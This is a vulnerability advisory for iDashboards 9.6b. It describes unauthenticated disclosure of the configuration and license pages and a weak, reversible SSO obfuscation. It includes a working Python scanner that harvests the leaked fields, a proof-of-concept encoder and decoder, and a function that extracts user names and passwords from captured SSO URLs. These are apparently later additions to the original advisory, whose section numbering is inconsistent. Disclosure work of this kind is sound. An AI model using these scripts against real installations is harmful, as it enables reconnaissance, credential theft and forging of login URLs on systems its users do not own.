iDashboards 9.6b, Multiple Vulnerabilities
# Authors: Andrea Ferraris, Raffaele Forte
# Vendor Homepage: https://www.idashboards.com/
# Version: 9.6b and earlier
iDashboards is a closed-source product for visualizing data as charts and dashboards.
Its web application suffers from multiple vulnerabilities, described below.
1. Sensitive Data Exposure
Several paths are reachable without authentication and disclose information about the installation.
a. Configuration Disclosure (CVE-2018-7209)
Requesting “https://<url>/idashboards/config.xml” without any session returns the server configuration, including the product version, internal URLs and the administration URL:
[...]
<serverURL>/idashboards/idb?CMD=$C$</serverURL>
<dashReportURL>/idashboards/idb/reports/prep/d/$DASH_ID$/$FORMAT$/$INLINE$/</dashReportURL>
<chartReportURL>/idashboards/idb/reports/prep/c/$CHART_ID$-$DASH_ID$/$FORMAT$/$INLINE$/</chartReportURL>
<serverRoot>/idashboards/</serverRoot>
[...]
<version>9.6b</version>
<productID>9.6b-181217101653-160.45</productID>
<companyName>XXX snc | XXX </companyName>
[...]
<adminUrl>http://XXXXXXX:6700/idashboards/admin/</adminUrl>
[...]
b. License information disclosure (CVE-2018-7210)
To install the license, the administrator visits “https://<url>/idb/config?CMD=installLicense”.
Once a license has been applied, that page remains reachable by unauthenticated users. An attacker can therefore read details of the installation (license type, internal IP address, server name, etc.) and the names of any guest accounts:
Licensed to: XXX snc
License expires: Never
Licensed CPUs: Unlimited
Number of named users: 51
Number of concurrent users: 51
Guest users: guest
Licensed IP Addresses: 10.1.1.7
Licensed Domain(s):
Server Name: XXXDASHBOARDS
Server IP Address: 10.1.1.7
Server CPUs: 8
License type: XXX-XX-XXXX
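The following Python script is an added example, not part of the original advisory, that checks a target for both disclosures above: it requests the two unauthenticated URLs named in this advisory, extracts the sensitive elements from config.xml and the license fields from the installLicense page, and reports an empty result when the license page is not exposed (redirect, login form). The sample responses embedded in it are constructed from the advisory's excerpts; the <config> root element name, the host names and the "one field per line" rendering of the license page are assumptions.

```python
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Paths named in the advisory, relative to the site root.
CONFIG_PATH = "/idashboards/config.xml"
LICENSE_PATH = "/idb/config?CMD=installLicense"

# config.xml elements whose values are worth reporting.
SENSITIVE_TAGS = ("version", "productID", "companyName", "adminUrl", "serverRoot")

# Labels on the installLicense page, read as text with one "Label: value" per line.
LICENSE_FIELDS = ("Licensed to", "Guest users", "Licensed IP Addresses",
                  "Server Name", "Server IP Address", "License type")

# Constructed sample responses modelled on the advisory's excerpts; the
# <config> root element name and the host names are assumptions.
SAMPLE_CONFIG_XML = """<config>
  <serverURL>/idashboards/idb?CMD=$C$</serverURL>
  <serverRoot>/idashboards/</serverRoot>
  <version>9.6b</version>
  <productID>9.6b-181217101653-160.45</productID>
  <companyName>Example snc</companyName>
  <adminUrl>http://dash.internal:6700/idashboards/admin/</adminUrl>
</config>"""

SAMPLE_LICENSE_TEXT = """Licensed to: Example snc
License expires: Never
Number of named users: 51
Guest users: guest
Licensed IP Addresses: 10.1.1.7
Licensed Domain(s):
Server Name: EXAMPLEDASH
Server IP Address: 10.1.1.7
License type: XXX-XX-XXXX
"""


def check_urls(base_url):
    """The two URLs to request on a target, without any session cookie."""
    base = base_url.rstrip("/")
    return [base + CONFIG_PATH, base + LICENSE_PATH]


def disclosed_config(xml_text):
    """Sensitive values present in a config.xml body. When adminUrl is
    present the host:port part is added separately, since it leaks an
    internal host name and the admin port."""
    root = ET.fromstring(xml_text)
    found = {}
    for tag in SENSITIVE_TAGS:
        el = root.find(".//" + tag)
        if el is not None and el.text and el.text.strip():
            found[tag] = el.text.strip()
    if "adminUrl" in found:
        found["adminHost"] = urllib.parse.urlsplit(found["adminUrl"]).netloc
    return found


def license_disclosure(status, body):
    """Fields leaked by the installLicense page to an unauthenticated client.
    An empty dict means the page is not exposed (redirect, login form, ...)."""
    if status != 200 or "Licensed to:" not in body:
        return {}
    found = {}
    for field in LICENSE_FIELDS:
        m = re.search(re.escape(field) + r":[ \t]*(.*)", body)
        if m and m.group(1).strip():
            found[field] = m.group(1).strip()
    return found


if __name__ == "__main__":
    import sys
    import urllib.error
    import urllib.request
    config_url, license_url = check_urls(sys.argv[1])
    try:
        with urllib.request.urlopen(config_url, timeout=10) as r:
            print("config.xml:", disclosed_config(r.read().decode("utf-8", "replace")))
        with urllib.request.urlopen(license_url, timeout=10) as r:
            # Crude HTML-to-text: every tag becomes a line break (assumption
            # about the page layout, good enough for "Label: value" rows).
            text = re.sub(r"<[^>]+>", "\n", r.read().decode("utf-8", "replace"))
            print("license page:", license_disclosure(r.getcode(), text))
    except urllib.error.HTTPError as e:
        print("not exposed, HTTP", e.code)
```

Run it as `python3 check_idashboards.py https://<url>`; a non-empty dictionary for either request confirms the corresponding disclosure.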
2. Reverse engineering of SSO obfuscation (CVE-2018-7211)
The vendor's own Admin Manual states that the SSO obfuscation is weak:
The iDashboards obfuscation library uses a proprietary, weak two-way encryption algorithm to obfuscate text. It is possible that a resourceful attacker could reverse-engineer the algorithm and use it to obfuscate SSO login URLs, or decode obfuscated ones. Moreover, anyone with access to the idb_encrypt.jar file or idb_encrypt.dll, and the proper knowledge, could use it to obfuscate SSO login URLs.
The algorithm is indeed easy to reverse-engineer. As the PoC below shows, each character is transformed by flipping a single bit, the bit position cycling through 0..7 as the string advances, and the result is hex-encoded; flipping the same bit again restores the original character:
import sys

# Each character value is XORed with 2**i (one bit flipped); i cycles
# through 0..7 as the position in the string advances. Output is hex.

def encrypt(string):
    i = 0
    out = ""
    for c in string:
        power = pow(2, i)
        if power == 256:
            i = 0
            power = pow(2, i)
        i += 1
        val = ord(c)
        k = val // power
        if k % 2 == 0:      # bit i is clear: set it
            val += power
        else:               # bit i is set: clear it
            val -= power
        out += format(val, '02x')   # two hex digits per byte, so decrypt() can split pairs
    return out

def decrypt(string):
    i = 0
    k = 0
    array = []
    l = len(string) - 1
    while k < l:            # split the hex string into byte values
        array.append(int(string[k:k+2], 16))
        k += 2
    out = ""
    for c in array:
        power = pow(2, i)
        if power == 256:
            i = 0
            power = pow(2, i)
        i += 1
        val = c
        k = val // power
        if k % 2 == 0:
            val += power
        else:
            val -= power
        out += chr(val)
    return out

def main(args):
    if len(args) < 3 or args[1] not in ('d', 'e'):
        print("Usage: " + args[0] + " <d|e> string")
        return
    if args[1] == 'd':
        o = decrypt(args[2])
    else:
        o = encrypt(args[2])
    print(o)

if __name__ == '__main__':
    main(sys.argv)
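The same scheme written as a plain XOR, as an added example that is not part of the original advisory: byte p of the text is XORed with 1 << (p % 8), so one loop serves both directions. The extra function shows what the weakness buys an attacker who captures an obfuscated SSO login URL: the query string is decoded and its parameters parsed. The parameter names (user, pass) and the sample URL are assumptions, not taken from the product.

```python
import urllib.parse

HEX_DIGITS = set("0123456789abcdefABCDEF")


def _flip_bits(data: bytes) -> bytes:
    """XOR byte p with 1 << (p % 8): one bit flipped per byte, the bit
    position cycling 0..7. Applying it twice restores the input."""
    return bytes(b ^ (1 << (p % 8)) for p, b in enumerate(data))


def obfuscate(text: str) -> str:
    """Hex form of the obfuscated text, two digits per byte (latin-1,
    since the scheme works on single bytes)."""
    return _flip_bits(text.encode("latin-1")).hex()


def deobfuscate(blob: str) -> str:
    """Recover the clear text from an obfuscated hex string."""
    if len(blob) % 2 or not set(blob) <= HEX_DIGITS:
        raise ValueError("not a hex-encoded blob")
    return _flip_bits(bytes.fromhex(blob)).decode("latin-1")


def extract_credentials(blob: str) -> dict:
    """Decode a captured SSO blob and return its query parameters.
    Parameter names are whatever the decoded string contains; the
    user/pass names used in the sample below are an assumption."""
    clear = deobfuscate(blob)
    query = clear.split("?", 1)[1] if "?" in clear else clear
    return {k: v[0] for k, v in urllib.parse.parse_qs(query).items()}


if __name__ == "__main__":
    # Constructed sample: what a MitM would see, and what it yields.
    captured = obfuscate("/idashboards/sso?user=alice&pass=s3cret")
    print(captured)
    print(extract_credentials(captured))
```

Because the transform is its own inverse and uses no key, anyone able to read the URL can decode it, and anyone who knows the scheme can forge a valid-looking one.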
IV. BUSINESS IMPACT
These flaws may compromise the integrity of the system and/or expose sensitive information.
Moreover, because the SSO obfuscation is reversible, an attacker in a man-in-the-middle position can recover the user name and password from an SSO login URL.
V. SYSTEMS AFFECTED
iDashboards 9.6b is vulnerable; earlier versions are probably affected as well.
VI. VULNERABILITY HISTORY
January 30th, 2018: Vulnerability identification
February 16th, 2018: Vendor notification
February 18th, 2018: CVE-ID reserved
VII. LEGAL NOTICES
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.